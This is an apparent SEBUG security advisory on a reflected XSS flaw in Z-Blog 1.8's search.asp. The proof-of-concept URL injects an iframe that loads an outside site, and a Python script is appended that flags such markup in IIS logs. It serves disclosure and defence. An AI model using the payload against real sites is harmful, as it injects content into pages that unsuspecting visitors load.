
Zblog 1.8 search.asp cross-site scripting (XSS) vulnerability

SEBUG-ID:19246
SEBUG-Appdir:Z-BLOG
Published:2009-12-25
author:猪哥靓 (67856456_at_qq.com)
Vulnerable:
Zblog 1.8
Description:
北洋贱队(http://bbs.seceye.org)

Zblog is a blog (weblog) application built on the ASP platform.

search.asp has a security vulnerability in how it handles user-submitted data.

demo: http://localhost/search.asp?q=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.gohack.org+insafe
<*References
http://bbs.seceye.org/viewthread.php?tid=161
http://www.gohack.org/
*>
Exploit:
The following procedures (methods) may contain something offensive; they are only for security research and teaching. Use at your own risk!
http://localhost/search.asp?q=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.gohack.org+insafe
SEBUG Solution:
Wait for the vendor to release an official patch.
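
While no official patch is available, requests that carry markup in the q parameter of search.asp can be flagged in the web server log. The script below is an added example, not part of the original advisory or of Z-Blog's code; the simplified IIS W3C field layout and the sample log lines are constructed assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample in a simplified IIS W3C layout (assumed field order).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2009-12-26 09:00:01 GET /search.asp q=hello+world 200
2009-12-26 09:00:07 GET /search.asp q=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.gohack.org+insafe 200
2009-12-26 09:00:09 GET /Search.asp q=%253Cb%253E 200
2009-12-26 09:00:12 GET /default.asp q=%3Cb%3E 200
""".splitlines()

# Angle brackets only: quotes would also flag ordinary searches.
MARKUP = re.compile(r"[<>]")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search_requests(lines):
    """Return (timestamp, decoded q, HTML-escaped q) for flagged requests."""
    hits = []
    for line in lines:
        if line.startswith("#"):
            continue  # W3C directive line, not a request
        fields = line.split()
        if len(fields) < 6:
            continue
        stem, query = fields[3], fields[4]
        if not stem.lower().endswith("/search.asp"):
            continue  # IIS paths are case-insensitive
        for raw in parse_qs(query, keep_blank_values=True).get("q", []):
            value = decode_fully(raw)  # parse_qs already decoded once
            if MARKUP.search(value):
                # Escape before reporting so an HTML log viewer stays safe.
                hits.append((f"{fields[0]} {fields[1]}", value, html.escape(value)))
    return hits


if __name__ == "__main__":
    for hit in suspicious_search_requests(SAMPLE_LOG):
        print(hit)
```

The escaped third element is also what the q value looks like once HTML-encoded on output, which in classic ASP is done with Server.HTMLEncode.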
// sebug.net [2010-03-10]